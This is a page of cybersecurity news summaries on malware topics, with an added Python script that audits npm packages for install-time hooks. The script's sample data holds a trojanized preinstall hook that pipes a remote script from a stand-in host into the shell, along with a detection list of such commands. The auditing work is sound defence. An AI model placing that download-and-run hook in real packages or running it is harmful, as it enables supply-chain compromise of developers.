Topic: malware analysis
REMnux v8: AI-Powered Malware Analysis for Linux
REMnux v8 is a major rebuild of the malware analysis Linux distribution, migrating to Ubuntu 24.04 and introducing a new, flexible Cast-based installer for easier deployment. The release's most significant feature is the REMnux MCP server, which connects AI agents directly to over 200 analysis to...
Beware: Fake 7-Zip Site Pushes Malware-Laden Installer
A fraudulent website impersonating the official 7-Zip download site distributes a trojanized installer that silently enrolls the victim's computer in a residential proxy network used to route malicious traffic. The lookalike site copies the legitimate site's appearance, and the installer deploys hidden components, modi...
500 npm Packages Infected by Shai-Hulud Malware Leaking Secrets
Over 500 npm packages, including ones published by Zapier and Postman, have been compromised by the Shai-Hulud malware, which steals developer secrets and uploads them to rapidly multiplying GitHub repositories. The attack uses trojanized versions of legitimate packages to inject malicious scrip...
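As an added illustration (not code from the Shai-Hulud write-up or from any affected project): the infection vector described above depends on install-time lifecycle scripts in package.json, which npm runs automatically during `npm install`. The Python below audits a node_modules tree for such hooks and flags any whose command downloads or evaluates code. The three package manifests it writes to a temporary directory are constructed for this example, and the suspicious-token list is a heuristic assumption rather than a published indicator.

```python
"""Audit a node_modules tree for install-time lifecycle hooks in package.json.

Added example for this page; the manifests and heuristics are constructed, not
taken from the Shai-Hulud report or from any real package.
"""
import json
import os
import tempfile

# Lifecycle scripts that npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Fragments that rarely belong in a legitimate install hook (heuristic assumption).
SUSPICIOUS_TOKENS = ("curl ", "wget ", "| sh", "| bash", "base64", "node -e", "eval(")


def audit_manifest(manifest, location="<manifest>"):
    """Return findings for one parsed package.json.

    Each finding is a dict with package, location, hook, command and severity.
    Severity is "high" when the hook command contains a suspicious token and
    "info" otherwise (a hook exists and deserves a look, e.g. native builds).
    """
    findings = []
    name = manifest.get("name", "<unnamed>")
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        lowered = cmd.lower()
        hit = any(tok in lowered for tok in SUSPICIOUS_TOKENS)
        findings.append({
            "package": name,
            "location": location,
            "hook": hook,
            "command": cmd,
            "severity": "high" if hit else "info",
        })
    return findings


def audit_tree(root):
    """Walk a directory tree and audit every package.json found under it."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        path = os.path.join(dirpath, "package.json")
        try:
            with open(path, encoding="utf-8") as fh:
                manifest = json.load(fh)
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip rather than abort
        findings.extend(audit_manifest(manifest, path))
    return findings


def build_sample_tree():
    """Write a constructed node_modules tree: a clean package, one with a
    benign native-build hook, and one trojanized with a download-and-run hook."""
    root = tempfile.mkdtemp(prefix="nm-audit-")
    packages = {
        "clean-lib": {"name": "clean-lib", "version": "1.0.0",
                      "scripts": {"test": "node test.js"}},
        "native-addon": {"name": "native-addon", "version": "2.3.1",
                         "scripts": {"install": "node-gyp rebuild"}},
        "trojanized-lib": {"name": "trojanized-lib", "version": "4.2.0",
                           "scripts": {"preinstall": "curl -s https://example.invalid/p.sh | sh",
                                       "test": "echo ok"}},
    }
    for dirname, manifest in packages.items():
        pkg_dir = os.path.join(root, "node_modules", dirname)
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for f in audit_tree(sample_root):
        print(f"[{f['severity']}] {f['package']} {f['hook']}: {f['command']}")
```

Against a real project, call `audit_tree("node_modules")` after a fresh install; a cheaper preventive control is to set `ignore-scripts=true` in `.npmrc` (or run `npm install --ignore-scripts`) and enable scripts only for the packages that genuinely need them.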
Android Tablet Backdoor & Dell Zero-Day: Critical Week in Review
A critical firmware backdoor in Android tablets and a long-running espionage campaign exploiting a Dell zero-day highlight persistent supply chain security challenges and the stealthy nature of modern cyber adversaries. The role of the CISO is evolving to manage AI-augmented teams, while threats ...
$900K XSS Bounty, HybridPetya Attack, & Burger King Censorship
Restaurant Brands International issued a DMCA takedown against researchers who exposed data vulnerabilities, despite the issues being patched after private reporting. Google distributed $1.6 million in rewards at a cloud-focused bug bounty event, contributing to a total of $2.5 million in cloud-r...
CISA releases Thorium: Open-source malware & forensic analysis tool
CISA launched Thorium, an open-source platform for malware analysis and forensic investigations, developed with Sandia National Laboratories to automate and scale cyberattack investigations. Thorium can schedule more than 1,700 jobs per second and ingest over 10 million files per hour, integrating commercial and custom tools for thre...
Microsoft's RIFT: Open-Source Tool for Rust Malware Analysis
Microsoft released RIFT, an open-source tool for analyzing Rust-based malware, addressing challenges posed by Rust's compilation methods and large binary sizes. RIFT uses three integrated components (static analyzer, signature generator, and IDA plugin) with FLIRT and binary diffing to efficientl...
Putting NICE Guidelines into Practice: Training Insights
SMBs can effectively train employees against cyber threats by focusing on a streamlined, scenario-based program derived from the NICE Framework, targeting the most common attacks like phishing, malware, and web-based threats. The training integrates technical skills with legal knowledge through r...
Russia's Sandworm Blamed for Polish Power Grid Wiper Attack
A cyberattack on Poland's energy grid in late 2025 has been attributed to Sandworm, the Russian state-sponsored hacking group, which used the destructive DynoWiper malware; the attack did not cause a power outage. The attack's timing is seen as symbolic, coinciding with the 10-year anniversary of Sandworm's 2015...
Urgent Samsung Patch Stops Spyware Exploit
Samsung has released a critical security update for a vulnerability (CVE-2025-21042) in its image processing library, which was actively exploited to install the LANDFALL spyware on mobile devices. The spyware uses a zero-click infection method via manipulated image files, allowing it to infect d...
Parrot OS Unveils 2026 Roadmap for Security & Platform Upgrades
Parrot OS is a specialized Debian-based Linux distribution for cybersecurity, integrating tools for penetration testing, forensics, malware analysis, and privacy research. The 2026 roadmap focuses on platform upgrades, including enhanced support for lightweight and container-based deployments, an...
ShadowV2: Self-Service DDoS Attacks Now Available
ShadowV2 is a DDoS botnet that compromises exposed, misconfigured Docker daemons and offers a self-service model that lets customers launch their own attacks using legitimate development tools. It uses a Python-based command-and-control infrastructure hosted on GitHub Codespaces to deploy malicious cont...
China-Linked Hackers Exploit Cisco Firewall Zero-Days
Cisco has released emergency patches for two actively exploited zero-day vulnerabilities (CVE-2025-20333 and CVE-2025-20362) in its ASA and FTD firewall software, linked to the ArcaneDoor espionage campaign. The vulnerabilities allowed attackers, suspected to be a China-based group, to execute co...
Active Attacks Exploit Cisco ASA Zero-Day Flaws
A coordinated international cybersecurity alert warns of active attacks exploiting zero-day vulnerabilities in Cisco ASA and FTD software, attributed to a sophisticated, likely state-sponsored threat actor linked to previous ArcaneDoor campaigns. Two critical vulnerabilities (CVE-2025-20362 and C...
Top Cybersecurity Jobs Hiring in September 2025
The cybersecurity field is experiencing high demand for professionals in September 2025, with global opportunities available in various roles and work arrangements, including remote positions. Key roles being recruited for include Application Security Engineers, CISOs, Cloud Security Architects, ...
Python Foundation Rejects US Security Grant
The Python Software Foundation rejected a $1.5 million U.S. government grant because the terms would have prohibited its diversity, equity, and inclusion (DEI) initiatives, conflicting with its core mission. The grant was intended to fund the development of proactive security tools for the Python...
Africa-Wide Cybercrime Sweep: 574 Arrests, $3M Recovered
Operation Sentinel, a coordinated international law enforcement effort across 19 African countries, resulted in 574 arrests and the recovery of $3 million, targeting major cybercrimes like business email compromise and ransomware. The operation caused significant technical disruptions by taking d...